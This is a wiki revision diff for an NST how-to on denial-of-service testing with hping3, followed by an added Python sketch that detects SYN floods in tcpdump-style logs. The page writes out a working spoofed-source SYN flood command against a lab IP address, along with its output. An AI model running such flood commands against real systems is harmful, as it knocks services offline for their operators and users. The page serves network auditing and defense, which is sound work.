Difference between revisions of "HowTo Perform A Security Audit With hping3 (DoS)"

From NST Wiki
(DoS Using hping3)
(DoS Using hping3)
Line 28: Line 28:
 
|Force packets to use this network interface device: "'''lan0'''"  only.
 
|Force packets to use this network interface device: "'''lan0'''"  only.
 
|-
 
|-
|-c 1000000
+
| -c 1000000
 
|Stop after sending (and receiving) count response packets.
 
|Stop after sending (and receiving) count response packets.
 
|-
 
|-
|-d 120
+
| -d 120
 
|Set the packet body size.
 
|Set the packet body size.
 
|-
 
|-
|-S
+
| -S
 
|Set the TCP/IP SYN flag thus sending out sync packets.
 
|Set the TCP/IP SYN flag thus sending out sync packets.
 
|-
 
|-
|-w 64
+
| -w 64
 
|Set the TCP/IP window size: "'''64 octets'''"
 
|Set the TCP/IP window size: "'''64 octets'''"
 
|}
 
|}
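Review bot: The interface row at the top of this hunk (description cell "Force packets to use this network interface device: lan0 only") is left unchanged, and its option cell is not visible here. If that cell is written as "|-I lan0", it has the same problem these four rows had: MediaWiki reads a line starting with "|-" as a table row separator, so the option text never renders. Please check it and add the same space after the pipe that was added for -c, -d, -S and -w. The description for -d 120 would also be clearer with its unit (bytes) stated.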

Revision as of 12:31, 22 October 2016

Overview

This page discusses the use of hping3 to perform a Denial-of-Service (DoS) attack as part of a security audit. Information on this page was derived from the blackMORE Ops article: "Denial-of-service Attack – DoS using hping3 with spoofed IP in Kali Linux". hping3 is installed on Network Security Toolkit (NST), like many other security auditing and penetration testing tools.

hping3 Explained

hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. hping3 is scriptable using the Tcl language and implements an engine for string-based, human-readable descriptions of TCP/IP packets, so that the programmer can write scripts related to low-level TCP/IP packet manipulation and analysis in a very short time.

Like most tools used in computer security, hping3 is useful to security experts, but there are a lot of applications related to network testing and system administration.

hping3 Intended Use Cases

  • Traceroute / ping / probe hosts behind a firewall that blocks attempts using the standard utilities.
  • Perform the idle scan (now implemented in nmap with an easy user interface).
  • Test firewall rule sets.
  • Test IDS systems.
  • Exploit known vulnerabilities of TCP/IP stacks.
  • Networking research.
  • Learn and explore TCP/IP.
  • Write real applications related to TCP/IP testing and security.
  • Automated firewall tests.
  • Proof of concept exploits.
  • Networking and security research when there is the need to emulate complex TCP/IP behavior.
  • Prototype IDS systems.
  • Simple to use networking utilities with Tk interface.

DoS Using hping3

This use case demonstrates a DoS TCP/IP SYN flood attack using hping3. The intended target, IPv4 address 10.222.222.15, will be flooded with TCP/IP SYN packets. One can then observe the behavior of the target system during the DoS attack for stability, responsiveness and performance. The following parameters are explained for this use case:

-I lan0 Force packets to use this network interface device: "lan0" only.
-c 1000000 Stop after sending (and receiving) count response packets.
-d 120 Set the packet body size.
-S Set the TCP/IP SYN flag thus sending out sync packets.
-w 64 Set the TCP/IP window size: "64 octets"

 

[root@probe ~]# /usr/sbin/hping3 -I lan0 -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source 10.222.222.15;

HPING 10.222.222.15 (lan0 10.222.222.15): S set, 40 headers + 120 data bytes
hping in flood mode, no replies will be shown
^C
--- 10.222.222.15 hping statistic ---
2031701 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

[root@probe ~]#
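From the target's side, the flood above has a recognisable shape: SYN-only packets to one port from almost entirely distinct sources, none of which completes the handshake, each carrying a 120-byte payload and a window of 64. The following detection sketch is an added example, not part of the original wiki page, hping3 or NST. The log lines are constructed in `tcpdump -nn` text style, and the function names and thresholds are assumptions.

```python
import re
from collections import defaultdict

# tcpdump -nn style text line: "... IP src.sport > dst.dport: Flags [S], ..., win N, ... length N"
LINE = re.compile(
    r"IP (?P<src>\d+\.\d+\.\d+\.\d+)\.\d+ > (?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): "
    r"Flags \[(?P<flags>[^\]]+)\].*?win (?P<win>\d+).*?length (?P<len>\d+)")

def constructed_capture():
    """Constructed sample lines (not real traffic): a flood plus normal clients."""
    flood = [f"12:00:00.{i:06d} IP 198.18.{i // 250}.{i % 250 + 1}.{1024 + i} > "
             f"10.222.222.15.80: Flags [S], seq {i}, win 64, length 120"
             for i in range(500)]
    normal = []
    for i in range(150):  # each client sends a SYN, then the ACK that completes the handshake
        peer = f"IP 192.0.2.{i + 1}.{40000 + i} > 10.222.222.16.80:"
        normal.append(f"12:00:01.{i:06d} {peer} Flags [S], seq {i}, win 29200, length 0")
        normal.append(f"12:00:01.{i:06d} {peer} Flags [.], ack 1, win 229, length 0")
    return flood + normal

def syn_flood_findings(lines, min_syns=100, min_src_ratio=0.9, max_completed=0.1):
    """Return {(dst, dport): stats} for destinations whose SYNs look flooded."""
    per_dst = defaultdict(lambda: {"syns": 0, "srcs": set(), "acked": set(),
                                   "payload": 0, "win64": 0})
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue
        s = per_dst[(m["dst"], int(m["dport"]))]
        if m["flags"] == "S":                 # SYN without ACK: a new connection attempt
            s["syns"] += 1
            s["srcs"].add(m["src"])
            s["payload"] += int(m["len"]) > 0  # data in a SYN is rare in normal traffic
            s["win64"] += int(m["win"]) == 64  # matches the -w 64 setting used above
        elif m["flags"] == ".":               # bare ACK: the client finished the handshake
            s["acked"].add(m["src"])
    findings = {}
    for dst, s in per_dst.items():
        if s["syns"] < min_syns:
            continue
        src_ratio = len(s["srcs"]) / s["syns"]              # ~1.0 with randomized sources
        completed = len(s["srcs"] & s["acked"]) / len(s["srcs"])
        if src_ratio >= min_src_ratio and completed <= max_completed:
            findings[dst] = {"syns": s["syns"], "distinct_sources": len(s["srcs"]),
                             "syn_with_payload": s["payload"], "win64": s["win64"]}
    return findings

if __name__ == "__main__":
    for dst, info in syn_flood_findings(constructed_capture()).items():
        print(dst, info)
```

The 150 normal clients also exceed the SYN count threshold with all-distinct sources, but they are not flagged because every one of them completes its handshake.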